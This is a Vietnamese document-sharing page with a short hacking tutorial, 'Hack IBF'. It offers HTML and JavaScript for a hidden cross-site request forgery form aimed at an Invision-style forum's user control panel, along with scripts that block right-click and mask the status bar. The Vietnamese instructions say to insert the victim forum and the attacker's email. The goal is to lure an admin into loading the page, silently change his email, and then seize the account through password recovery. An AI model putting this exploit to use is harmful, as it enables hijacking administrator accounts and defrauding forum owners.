Hack IBF
Bạn đang xem bản rút gọn của tài liệu. Xem và tải ngay bản đầy đủ của tài liệu tại đây (35.44 KB, 3 trang )
Hack IBF :
trang này đã được đọc lần
Có thể dùng đoạn script này :
<script language=JavaScript1.1>
<!-- var boodschap =':::> Copyright @ 2002 ... Minabond Design Read Code <:::';
function dgstatus()
{
window.status = boodschap;
timerID= setTimeout("dgstatus()",100);
}
dgstatus();
--> </SCRIPT>
<script language="JavaScript">
<!-- function MM_openBrWindow(theURL,winName,features)
{
//v2.0 window.open(theURL,winName,features);
} //-->
</script>
<script LANGUAGE="JavaScript">
<!-- document.oncontextmenu = function()
{return false}
if(document.layers)
{ window.captureEvents(Event.MOUSEDOWN);
window.onmousedown = function(e)
{ if(e.target==document)return false;
}
} else
{ document.onmousedown = function(){return false}
}
// --> </script> </tr>
<form action=" method="post" target="a1" name='form1'>
<input type='hidden' name='act' value='UserCP'>
<input type='hidden' name='CODE' value='09'>
<input type='hidden' name='s' value='453be091bae994e3d64542e82ec494b7'>
<tr> <td class='row1' width='70%' align='left'>
<input type='hidden' name='in_email_1' value=*****@yahoo.com' class='forminput'><
/td> </tr> <tr>
<td class='row1' width='70%' align='left'>
<input type='hidden' name='in_email_2' value='*****@yahoo.com' class='forminput'>
</td> </tr> <tr>
<td class='row2' align='center' colspan='2'>
<input type="submit" name='change_email' value=" Continue " class='forminput'>
</td> </tr> </form>
<!-- end main CP area --> </table> </td> </tr> </table> </td> </tr> </table>
<script language='Javascript'>
<!-- function jump_page(internal)
{
var f = document.jumpForm.themenu;
var base_url = " /> if (f.options[f.selectedIndex].value == -1)
{
return false;
}
var l_data = f.options[f.selectedIndex].value; s_data = l_data.split("|"); if (s_data[0] == 0)
{ window.location = base_url + s_data[1];
} else
{
window.open( s_data[1], 'width=800,height=600,top=0,left=0,resizable=1,scrollbars=1,
location=yes,directories=yes,status=yes,menubar=yes,toolbar=yes');
} }
--> </script>
Đọc kĩ chú ý, - thay tên forum backkhoa.org = tên victim và
-453be091bae994e3d64542e82ec494b7 đây chính là đoạn mã ngẫu nhiêu board tự động chạy
trên lí thuyết nó luôn luôn thay đổi nhưng chúng ta hoàn toàn có thể sử dụng được một trong
những string ngẫu nhiên board sinh ra chắc hẳn các bạn nhìn thấy cái này -*****@yahoo.com
hãy thay nó bằng địa chỉ mail của bạn . đọc kĩ hơn một chút chắc hẳn ta đã nhận ra công dụng
của đoạn code này? đúng nó thay đổi email của admin diễn đàn một khi admin đó bị mặc lừa.
Nói cách khác cách này hoàn toàn là lừa đảo chỉ với một câu nói khiêu khích thách thức
admin.Nếu không tỉnh táo sẽ mắc lừa và email sẽ bị thay đổi lúc đó dùng chức năng forgotpass
để lấy pass và.....hack hết không còn gì để giải thích.
